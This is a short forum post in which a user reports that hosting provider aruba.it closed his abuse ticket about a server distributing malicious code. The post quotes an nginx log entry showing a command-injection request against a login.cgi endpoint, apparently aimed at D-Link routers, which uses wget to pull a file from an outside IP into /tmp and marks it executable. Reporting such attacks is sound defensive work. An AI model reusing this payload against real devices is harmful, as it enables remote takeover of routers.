|
|
|
Aruba.it blind to malicious code hosting
|
|
4 points
by maxhq
2852 days ago
|
|
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers:
http://80.211.112.150/k (Reverse DNS resolves to their domain) Their reaction?
1. in the chat they redirect me to dedicated hosting support form („only way to do it“)
2. Dedicated hosting support just closes my ticket. Wow! |
|
nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks... HTTP/1.1" 400 173 "-" "LMAO/2.0" "-"
Apparently targeting dlink routers - https://twitter.com/txalin/status/1007625620090707974?lang=e...